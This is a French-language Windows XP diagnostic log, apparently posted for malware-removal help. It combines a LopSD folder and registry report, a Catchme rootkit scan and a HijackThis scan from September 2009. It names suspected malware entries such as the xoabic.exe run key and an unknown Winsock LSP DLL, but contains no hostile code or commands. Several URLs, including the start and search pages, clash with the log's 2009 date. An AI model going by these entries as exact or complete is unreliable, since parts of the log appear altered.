[14/10/2004|09:43] C:\DOCUME~1\Michel\APPLIC~1\Real
[21/05/2005|16:02] C:\DOCUME~1\Michel\APPLIC~1\River Past G2
[23/10/2006|19:03] C:\DOCUME~1\Michel\APPLIC~1\River Past G4
[01/01/2009|11:58] C:\DOCUME~1\Michel\APPLIC~1\Samsung
[04/11/2008|22:06] C:\DOCUME~1\Michel\APPLIC~1\Skype
[20/10/2008|17:32] C:\DOCUME~1\Michel\APPLIC~1\skypePM
[25/01/2007|21:21] C:\DOCUME~1\Michel\APPLIC~1\SlySoft
[27/09/2009|16:54] C:\DOCUME~1\Michel\APPLIC~1\SolidDocuments
[02/04/2005|16:49] C:\DOCUME~1\Michel\APPLIC~1\Sony
[26/12/2008|18:30] C:\DOCUME~1\Michel\APPLIC~1\Sony Corporation
[19/11/2006|18:09] C:\DOCUME~1\Michel\APPLIC~1\Sports Interactive
[14/10/2004|11:36] C:\DOCUME~1\Michel\APPLIC~1\Sun
[07/10/2005|10:02] C:\DOCUME~1\Michel\APPLIC~1\Talkback
[18/02/2007|16:42] C:\DOCUME~1\Michel\APPLIC~1\U3
[04/10/2008|22:52] C:\DOCUME~1\Michel\APPLIC~1\uniblue
[15/09/2009|08:55] C:\DOCUME~1\Michel\APPLIC~1\uTorrent
[23/09/2009|21:31] C:\DOCUME~1\Michel\APPLIC~1\vlc
[19/08/2009|23:19] C:\DOCUME~1\Michel\APPLIC~1\Vso
[27/10/2008|09:08] C:\DOCUME~1\Michel\APPLIC~1\WinRAR
[27/09/2009|20:47] C:\DOCUME~1\Michel\APPLIC~1\ZoomBrowser EX
[25/02/2007|10:37] C:\DOCUME~1\NETWOR~1\APPLIC~1\Microsoft
[12/11/2005|13:02] C:\DOCUME~1\NETWOR~1\APPLIC~1\Mozilla
[22/07/2006|13:26] C:\DOCUME~1\NETWOR~1\APPLIC~1\SolidDocuments
[12/11/2005|13:02] C:\DOCUME~1\NETWOR~1\APPLIC~1\Talkback
[24/10/2004|19:42] C:\DOCUME~1\NETWOR~1\APPLIC~1\X10 Commander
[12/02/2005|17:47] C:\DOCUME~1\PROPRI~1\APPLIC~1\Ahead
[11/01/2005|22:20] C:\DOCUME~1\PROPRI~1\APPLIC~1\Real
--------------------\\ Tâches planifiées dans C:\WINDOWS\tasks
[27/09/2009 23:14][--ah-----] C:\WINDOWS\tasks\MP Scheduled Scan.job
[05/08/2004 14:00][-r-h-----] C:\WINDOWS\tasks\desktop.ini
[27/09/2009 23:09][--ah-----] C:\WINDOWS\tasks\SA.DAT
--------------------\\ Listing des dossiers dans C:\Program Files
[27/09/2009|22:38] C:\Program Files\Firefox
[20/04/2009|21:13] C:\Program Files\Adobe
[26/11/2005|17:19] C:\Program Files\Ahead
[02/11/2006|23:33] C:\Program Files\ALO Power Audio Converter
[02/11/2006|23:26] C:\Program Files\AltoMP3 Gold
[07/11/2008|23:21] C:\Program Files\Apple Software Update
[10/09/2006|09:58] C:\Program Files\Ashampoo
[05/12/2004|13:12] C:\Program Files\AWicons Lite
[23/09/2009|20:25] C:\Program Files\Belgacom
[29/05/2007|21:17] C:\Program Files\Belgium Identity Card
[02/11/2008|17:21] C:\Program Files\BitComet
[23/09/2009|17:43] C:\Program Files\Bonjour
[24/06/2007|22:39] C:\Program Files\BoontyGames
[11/12/2004|15:03] C:\Program Files\BVS Solitaire Collection
[18/02/2006|14:49] C:\Program Files\CA
[27/12/2008|12:45] C:\Program Files\Canon
[19/07/2008|11:46] C:\Program Files\CanonBJ
[23/09/2009|16:31] C:\Program Files\CCleaner
[23/12/2007|17:50] C:\Program Files\CD Audio Reader Filter
[28/02/2006|22:22] C:\Program Files\Cisco Systems
[25/01/2005|16:58] C:\Program Files\Common Files
[13/10/2004|21:24] C:\Program Files\ComPlus Applications
[14/04/2006|15:55] C:\Program Files\Corel
[24/10/2004|19:38] C:\Program Files\CyberLink
[13/04/2009|20:45] C:\Program Files\DIFX
[28/08/2007|09:33] C:\Program Files\Direct WAV MP3 Splitter
[23/12/2007|17:50] C:\Program Files\DirectVobSub
[09/01/2009|22:58] C:\Program Files\DivX
[26/12/2004|20:54] C:\Program Files\Doom 3
[09/01/2009|23:08] C:\Program Files\DScaler
[28/11/2007|17:51] C:\Program Files\DVD Decrypter
[28/11/2007|17:45] C:\Program Files\DVD Shrink
[16/03/2009|22:09] C:\Program Files\DVDFab 5
[19/08/2009|23:19] C:\Program Files\DVDFab 6
[21/10/2007|15:49] C:\Program Files\DVDFab Decrypter 3
[21/10/2007|15:50] C:\Program Files\DVDFab HD Decrypter 3
[17/03/2009|17:48] C:\Program Files\DVDIdle Pro
[14/03/2009|23:49] C:\Program Files\DVDVideoSoft
[05/12/2004|01:43] C:\Program Files\Elaborate Bytes
[10/02/2009|23:56] C:\Program Files\ElcomSoft
[14/10/2004|10:53] C:\Program Files\Encarta
[25/11/2004|22:30] C:\Program Files\EPSON
[23/09/2009|20:25] C:\Program Files\Fichiers communs
[21/08/2008|17:36] C:\Program Files\FileZilla FTP Client
[15/09/2009|18:34] C:\Program Files\FLAC
[15/09/2009|09:44] C:\Program Files\foobar2000
[27/08/2006|12:04] C:\Program Files\Free Audio Pack
[13/04/2009|20:55] C:\Program Files\Garmin
[13/04/2009|20:45] C:\Program Files\Garmin GPS Plugin
[29/12/2007|14:46] C:\Program Files\Gimp Pack Mode
[21/04/2008|21:56] C:\Program Files\Google
[23/12/2007|17:42] C:\Program Files\Haali
[18/10/2008|17:43] C:\Program Files\Hercules
[13/10/2004|23:39] C:\Program Files\HighMAT CD Writing Wizard
[11/12/2005|19:00] C:\Program Files\Home Cinema
[02/11/2006|23:11] C:\Program Files\Illustrate
[20/03/2005|18:17] C:\Program Files\iMeshBar
[14/02/2009|23:00] C:\Program Files\InstallShield Installation Information
[13/10/2004|22:26] C:\Program Files\Intel
[06/12/2004|02:09] C:\Program Files\InterActual
[29/07/2009|21:12] C:\Program Files\Internet Explorer
[16/01/2005|12:20] C:\Program Files\Iomega
[14/02/2009|23:20] C:\Program Files\iPod
[07/11/2008|23:24] C:\Program Files\iTunes
[15/08/2009|23:04] C:\Program Files\Java
[24/03/2007|15:53] C:\Program Files\K!TV
[18/03/2006|14:54] C:\Program Files\Lavalys
[14/06/2008|12:16] C:\Program Files\Lavasoft
[17/03/2008|22:44] C:\Program Files\LexarMedia
[09/10/2005|14:09] C:\Program Files\LizardTech
[24/09/2009|22:01] C:\Program Files\Malwarebytes' Anti-Malware
[14/10/2004|12:08] C:\Program Files\Medion Tools
[14/08/2008|00:35] C:\Program Files\Messenger
[15/07/2006|17:55] C:\Program Files\Microsoft AntiSpyware
[01/06/2008|22:49] C:\Program Files\Microsoft CAPICOM 2.1.0.2
[13/10/2004|21:26] C:\Program Files\microsoft frontpage
[08/01/2005|23:39] C:\Program Files\Microsoft Money 2005
[31/05/2008|09:48] C:\Program Files\Microsoft Office
[12/11/2004|19:53] C:\Program Files\Microsoft Visual Studio
[31/05/2008|09:48] C:\Program Files\Microsoft Works
[14/10/2004|10:40] C:\Program Files\Microsoft Works Suite 2005
[31/05/2008|09:47] C:\Program Files\Microsoft.NET
[02/08/2008|21:40] C:\Program Files\Movie Maker
[23/09/2009|21:53] C:\Program Files\Mozilla Firefox
[04/10/2008|22:32] C:\Program Files\MSBuild
[15/03/2008|08:54] C:\Program Files\MSECache
[26/11/2004|05:17] C:\Program Files\MSN
[13/10/2004|21:23] C:\Program Files\MSN Gaming Zone
[07/07/2006|18:57] C:\Program Files\MSN Messenger
[15/11/2006|15:26] C:\Program Files\MSXML 4.0
[10/04/2005|22:30] C:\Program Files\Music Manager
[03/04/2007|22:38] C:\Program Files\MusicBrainz Tagger
[24/10/2004|19:41] C:\Program Files\MUSICMATCH
[24/10/2004|19:29] C:\Program Files\muvee Technologies
[27/09/2009|22:22] C:\Program Files\Navilog1
[02/08/2008|21:38] C:\Program Files\NetMeeting
[26/12/2004|17:37] C:\Program Files\NewSoft
[19/09/2009|09:43] C:\Program Files\O Imaging Corporation
[18/02/2006|14:00] C:\Program Files\online more mess
[23/12/2007|17:50] C:\Program Files\OpenSource Flash Video Splitter
[13/08/2009|00:48] C:\Program Files\Outlook Express
[17/07/2008|22:31] C:\Program Files\PDFCreator
[09/01/2005|13:07] C:\Program Files\PHILIPS
[02/08/2009|11:13] C:\Program Files\Picasa2
[16/09/2006|18:28] C:\Program Files\Picture It! Premium 10
[13/02/2007|23:39] C:\Program Files\ProjectViewer
[07/11/2008|23:23] C:\Program Files\QuickTime
[13/10/2004|22:41] C:\Program Files\RALINK
[12/03/2007|03:19] C:\Program Files\Ratajik Software
[14/10/2004|09:41] C:\Program Files\Real
[23/12/2007|17:51] C:\Program Files\RealMedia
[04/10/2008|22:32] C:\Program Files\Reference Assemblies
[02/11/2008|21:30] C:\Program Files\Registry Clean Pro
[01/01/2009|11:46] C:\Program Files\Samsung
[06/03/2008|12:32] C:\Program Files\SearchRelevant
[25/12/2008|00:19] C:\Program Files\SEC
[13/10/2004|21:24] C:\Program Files\Services en ligne
[23/12/2007|17:50] C:\Program Files\SHOUTcast Source
[18/10/2008|13:18] C:\Program Files\Skype
[07/08/2006|21:07] C:\Program Files\SlySoft
[27/02/2005|16:19] C:\Program Files\SolidDocuments
[26/12/2008|17:56] C:\Program Files\Sony
[08/04/2006|21:46] C:\Program Files\Sony Ericsson
[22/09/2009|23:04] C:\Program Files\Spybot - Search & Destroy
[19/07/2008|07:42] C:\Program Files\SSC Service Utility
[12/03/2007|13:16] C:\Program Files\StreamRipper32
[02/11/2008|22:35] C:\Program Files\Sunbelt Software
[02/12/2006|14:40] C:\Program Files\support.com
[24/02/2006|11:43] C:\Program Files\Symantec
[27/09/2009|22:34] C:\Program Files\Symantec AntiVirus
[20/07/2007|20:18] C:\Program Files\TomTom HOME
[02/12/2006|00:01] C:\Program Files\Trustix
[04/10/2008|22:52] C:\Program Files\Uniblue
[13/10/2004|21:28] C:\Program Files\Uninstall Information
[13/10/2004|22:40] C:\Program Files\USB Wireless Keyboard Driver
[01/03/2009|17:42] C:\Program Files\uTorrent
[28/12/2007|23:11] C:\Program Files\VideoLAN
[02/04/2005|16:51] C:\Program Files\VSTplugins
[21/10/2007|22:29] C:\Program Files\Winamp Remote
[21/10/2007|22:29] C:\Program Files\Winamp Toolbar
[13/10/2004|23:18] C:\Program Files\Winbond Electronics Corp
[13/10/2004|22:53] C:\Program Files\WinDlg
[02/11/2006|21:20] C:\Program Files\Windows Defender
[13/10/2004|22:07] C:\Program Files\Windows Journal Viewer
[03/11/2006|23:19] C:\Program Files\Windows Media Bonus Pack for Windows XP
[03/11/2006|22:43] C:\Program Files\Windows Media Connect
[03/11/2006|22:46] C:\Program Files\Windows Media Connect 2
[02/08/2008|21:38] C:\Program Files\Windows Media Player
[02/08/2008|21:38] C:\Program Files\Windows NT
[13/10/2004|21:24] C:\Program Files\WindowsUpdate
[23/07/2006|08:10] C:\Program Files\WinRAR
[22/07/2006|21:55] C:\Program Files\WinZip
[13/10/2004|22:50] C:\Program Files\X10 Hardware
[13/10/2004|21:26] C:\Program Files\xerox
[09/06/2007|23:02] C:\Program Files\Xvid
[18/03/2007|17:41] C:\Program Files\Yahoo!
[20/03/2005|17:51] C:\Program Files\Zero G Registry
--------------------\\ Listing des dossiers dans C:\Program Files\Fichiers communs
[20/04/2009|21:13] C:\Program Files\Fichiers communs\Adobe
[14/10/2004|09:51] C:\Program Files\Fichiers communs\Ahead
[07/11/2008|23:21] C:\Program Files\Fichiers communs\Apple
[01/04/2007|19:58] C:\Program Files\Fichiers communs\AVSMedia
[26/02/2006|14:42] C:\Program Files\Fichiers communs\BOONTY Shared
[13/10/2004|23:18] C:\Program Files\Fichiers communs\Borland Shared
[27/12/2008|12:42] C:\Program Files\Fichiers communs\Canon
[15/07/2006|22:52] C:\Program Files\Fichiers communs\Corel
[12/11/2004|19:53] C:\Program Files\Fichiers communs\Designer
[17/12/2004|03:38] C:\Program Files\Fichiers communs\DirectX
[14/03/2009|23:49] C:\Program Files\Fichiers communs\DVDVideoSoft
[02/11/2008|17:30] C:\Program Files\Fichiers communs\EPSON
[19/11/2006|17:58] C:\Program Files\Fichiers communs\InstallShield
[14/10/2004|11:35] C:\Program Files\Fichiers communs\Java
[18/03/2005|23:40] C:\Program Files\Fichiers communs\Macrovision Shared
[22/02/2009|17:22] C:\Program Files\Fichiers communs\Microsoft Shared
[29/04/2005|20:08] C:\Program Files\Fichiers communs\MimarSinan
[13/10/2004|21:24] C:\Program Files\Fichiers communs\MSSoap
[24/10/2004|19:29] C:\Program Files\Fichiers communs\muvee Technologies
[03/11/2005|23:12] C:\Program Files\Fichiers communs\NSV
[13/10/2004|23:19] C:\Program Files\Fichiers communs\ODBC
[09/01/2005|13:07] C:\Program Files\Fichiers communs\PhilipsMM
[26/03/2007|20:48] C:\Program Files\Fichiers communs\Real
[13/10/2004|21:24] C:\Program Files\Fichiers communs\Services
[18/10/2008|13:18] C:\Program Files\Fichiers communs\Skype
[27/02/2005|16:19] C:\Program Files\Fichiers communs\SolidDocuments
[26/12/2008|17:55] C:\Program Files\Fichiers communs\Sony Shared
[13/10/2004|23:19] C:\Program Files\Fichiers communs\SpeechEngines
[23/09/2009|20:25] C:\Program Files\Fichiers communs\Supportsoft
[24/02/2006|11:52] C:\Program Files\Fichiers communs\Symantec Shared
[02/08/2008|21:38] C:\Program Files\Fichiers communs\System
[21/12/2006|21:44] C:\Program Files\Fichiers communs\SystemRequirementsLab
[08/04/2006|21:46] C:\Program Files\Fichiers communs\Teleca Shared
[14/06/2008|12:15] C:\Program Files\Fichiers communs\Wise Installation Wizard
[26/03/2007|20:48] C:\Program Files\Fichiers communs\xing shared
--------------------\\ Process
( 17 Processes )
... OK !
--------------------\\ Recherche avec S_Lop
Aucun fichier / dossier Lop trouvé !
--------------------\\ Recherche de Fichiers / Dossiers Lop
Aucun fichier / dossier Lop trouvé !
--------------------\\ Verification du Registre
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
..... OK !
--------------------\\ Verification du fichier Hosts
Fichier Hosts PROPRE
--------------------\\ Recherche de fichiers avec Catchme
catchme 0.3.1353 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2009-09-27 23:20:34
Windows 5.1.2600 Service Pack 3 NTFS
scanning hidden processes ...
scanning hidden files ...
scan completed successfully
hidden processes: 0
hidden files: 0
--------------------\\ Recherche d'autres infections
Aucune autre infection trouvée !
[F:1][D:2]-> C:\DOCUME~1\Michel\LOCALS~1\Temp
[F:2819][D:0]-> C:\DOCUME~1\Michel\Cookies
[F:7230][D:50]-> C:\DOCUME~1\Michel\LOCALS~1\TEMPOR~1\content.IE5
1 - "C:\Lop SD\LopR_1.txt" - dim. 27/09/2009|23:22 - Option : [2]
--------------------\\ Fin du rapport a 23:22:26
Hijackthis
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 0:10:18, on 28/09/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Fichiers communs\Symantec Shared\ccSetMgr.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Fichiers communs\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Fichiers communs\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDOWS\system32\drivers\CDAC11BA.EXE
C:\Program Files\Symantec AntiVirus\DefWatch.exe
C:\WINDOWS\system32\beidservicecrl.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Canon\IJPLM\IJPLMSVC.EXE
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\Sunbelt Software\Personal Firewall 4\kpf4ss.exe
C:\Program Files\CA\SharedComponents\CA_LIC\LogWatNT.exe
C:\Program Files\Fichiers communs\Microsoft Shared\VS7Debug\mdm.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\Program Files\Sunbelt Software\Personal Firewall 4\kpf4gui.exe
C:\Program Files\Belgacom\bin\sprtsvc.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Symantec AntiVirus\Rtvscan.exe
C:\Program Files\Canon\CAL\CALMAIN.exe
C:\Program Files\Sunbelt Software\Personal Firewall 4\kpf4gui.exe
C:\WINDOWS\CNYHKey.exe
C:\WINDOWS\mHotkey.exe
C:\Program Files\Fichiers communs\Symantec Shared\ccApp.exe
C:\PROGRA~1\SYMANT~1\VPTray.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
C:\WINDOWS\system32\RUNDLL32.EXE
C:\Program Files\Sony\Content Transfer\ContentTransferWMDetector.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Program Files\Belgacom\bin\sprtcmd.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Windows Media Player\WMPNSCFG.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\SEC\Natural Color Pro\NCProTray.exe
C:\Program Files\Java\jre6\bin\jqsnotify.exe
C:\Program Files\Java\jre6\bin\jqsnotify.exe
C:\Program Files\Outlook Express\msimn.exe
C:\Program Files\Java\jre6\bin\jqsnotify.exe
C:\Program Files\ Firefox\firefox.exe
C:\Program Files\Java\jre6\bin\jqsnotify.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Documents and Settings\Michel\Bureau\Securité\HiJackThis.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.proximus.be/pickx
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = https://www.msn.com/fr-fr/?ocid=iehp
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: Aide pour le lien d'Adobe PDF Reader - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Fichiers communs\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Fichiers communs\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Skype add-on (mastermind) - {22BF413B-C6D2-4d91-82A9-A0F997BA588C} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: Solid Converter PDF - {259F616C-A300-44F5-B04A-ED001A26C85C} - C:\Program Files\SolidDocuments\SolidConverterPDF\SCPDF\ExploreExtPDF.dll
O2 - BHO: Winamp Toolbar BHO - {25CEE8EC-5730-41bc-8B58-22DDC8AB8C20} - C:\Program Files\Winamp Toolbar\winamptb.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O3 - Toolbar: Solid Converter PDF - {259F616C-A300-44F5-B04A-ED001A26C85C} - C:\Program Files\SolidDocuments\SolidConverterPDF\SCPDF\ExploreExtPDF.dll
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O3 - Toolbar: Winamp Toolbar - {EBF2BA02-9094-4c5a-858B-BB198F3D8DE2} - C:\Program Files\Winamp Toolbar\winamptb.dll
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [Raccourci vers la page des propriétés de High Definition Audio] HDAudPropShortcut.exe
O4 - HKLM\..\Run: [ledpointer] CNYHKey.exe
O4 - HKLM\..\Run: [CHotkey] mHotkey.exe
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Fichiers communs\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [vptray] C:\PROGRA~1\SYMANT~1\VPTray.exe
O4 - HKLM\..\Run: [BluetoothAuthenticationAgent] rundll32.exe bthprops.cpl,,BluetoothAuthenticationAgent
O4 - HKLM\..\Run: [Windows Defender] "C:\Program Files\Windows Defender\MSASCui.exe" -hide
O4 - HKLM\..\Run: [GrooveMonitor] "C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe"
O4 - HKLM\..\Run: [CanonSolutionMenu] C:\Program Files\Canon\SolutionMenu\CNSLMAIN.exe /logon
O4 - HKLM\..\Run: [CanonMyPrinter] C:\Program Files\Canon\MyPrinter\BJMyPrt.exe /logon
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [ContentTransferWMDetector.exe] C:\Program Files\Sony\Content Transfer\ContentTransferWMDetector.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\Run: [Belgacom] "C:\Program Files\Belgacom\bin\sprtcmd.exe" /P Belgacom
O4 - HKLM\..\Run: [xoabic] C:\WINDOWS\system32\xoabic.exe \u
O4 - HKLM\..\Run: [Malwarebytes Anti-Malware (reboot)] "C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe" /runcleanupscript
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SERVICE RÉSEAU')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Global Startup: NCProTray.lnk = ?
O8 - Extra context menu item: &Winamp Toolbar Search - C:\Documents and Settings\All Users\Application Data\Winamp Toolbar\ieToolbar\resources\en-US\local\search.html
O8 - Extra context menu item: Add to Google Photos Screensa&ver - res://C:\WINDOWS\system32\GPhotos.scr/200
O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~4\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: E&xporteren naar Microsoft Excel - res://C:\PROGRA~1\MICROS~4\Office12\EXCEL.EXE/3000
O9 - Extra button: Verzenden naar OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~4\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: Verz&enden naar OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~4\Office12\ONBttnIE.dll
O9 - Extra button: Skype - {77BF5300-1474-4EC7-9980-D32B190E9B07} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O9 - Extra button: (no name) - {85d1f590-48f4-11d9-9669-0800200c9a66} - C:\WINDOWS\bdoscandel.exe
O9 - Extra 'Tools' menuitem: Uninstall BitDefender Online Scanner v8 - {85d1f590-48f4-11d9-9669-0800200c9a66} - C:\WINDOWS\bdoscandel.exe
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~4\Office12\REFIEBAR.DLL
O9 - Extra button: (no name) - {B205A35E-1FC4-4CE3-818B-899DBBB3388C} - C:\Program Files\Fichiers communs\Microsoft Shared\Encarta Search Bar\ENCSBAR.DLL
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra button: (no name) - SolidConverterPDF - (no file) (HKCU)
O10 - Unknown file in Winsock LSP: c:\windows\system32\846umtqvwes4.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\846umtqvwes4.dll
O15 - Trusted Zone: *.musicmatch.com
O15 - Trusted Zone: *.musicmatch.com (HKLM)
O16 - DPF: {1F2F4C9E-6F09-47BC-970D-3C54734667FE} (LSSupCtl Class) - https://support.norton.com/sp/en/us/home/current/info
O16 - DPF: {4D7F48C0-CB49-4EA6-97D4-04F4EACC2F3B} - http://sib1.od2.com/common/Member/ClientInstall/10.20.0002/OCI/setup.exe
O16 - DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} (MSN Photo Upload Tool) - http://by10fd.bay10.hotmail.msn.com/resources/MsnPUpld.cab
O16 - DPF: {5D637FAD-E202-48D1-8F18-5B9C459BD1E3} (Image Uploader Control) - http://belgacom.extrafilm.be/ImageUploader5.cab
O16 - DPF: {5D86DDB5-BDF9-441B-9E9E-D4730F4EE499} (BDSCANONLINE Control) - http://www.bitdefender.fr/scan_fr/scan8/oscan8.cab
O16 - DPF: {62475759-9E84-458E-A1AB-5D2C442ADFDE} - http://a1540.g.akamai.net/7/1540/52/20041101/qtinstall.info.apple.com/pthalo/fr/win/QuickTimeInstaller.exe
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://v5.windowsupdate.microsoft.com/v5consumer/V5Controls/en/x86/client/wuweb_site.cab?1097702632093
O16 - DPF: {6E5E167B-1566-4316-B27F-0DDAB3484CF7} (Image Uploader Control) - http://wisup.net/_plateforme/Upload/Aurigma/AurigmaActiveX/ImageUploader4.cab
O16 - DPF: {7B297BFD-85E4-4092-B2AF-16A91B2EA103} (WScanCtl Class) - http://www3.ca.com/securityadvisor/virusinfo/webscan.cab
O16 - DPF: {A73BAEFA-EE65-494D-BEDB-DD3E5A34FA98} (Image Uploader) - http://scarlet.extrafilm.be/ImageUploader4.cab
O16 - DPF: {A90A5822-F108-45AD-8482-9BC8B12DD539} (Crucial cpcScan) - http://www.crucial.com/controls/cpcScanner.cab
O16 - DPF: {B38870E4-7ECB-40DA-8C6A-595F0A5519FF} (MsnMessengerSetupDownloadControl Class) - http://messenger.msn.com/download/msnmessengersetupdownloader.cab
O16 - DPF: {BE833F39-1E0C-468C-BA70-25AAEE55775E} (System Requirements Lab) - http://www.systemrequirementslab.com/sysreqlab.cab
O16 - DPF: {C45B1500-7B63-47C2-AB25-C28CB46AFDEE} (OD2 Music Manager) - http://sib1.od2.com/common/musicmanager/installation/MusicManagerPlugin.CAB
O16 - DPF: {CE28D5D2-60CF-4C7D-9FE8-0F47A3308078} (ActiveDataInfo Class) - https://support.norton.com/sp/en/us/home/current/info
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
O16 - DPF: {EF791A6B-FC12-4C68-99EF-FB9E207A39E6} (McFreeScan Class) - http://download.mcafee.com/molbin/iss-loc/mcfscan/2,1,0,4810/mcfscan.cab
O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\FICHIE~1\Skype\SKYPE4~1.DLL
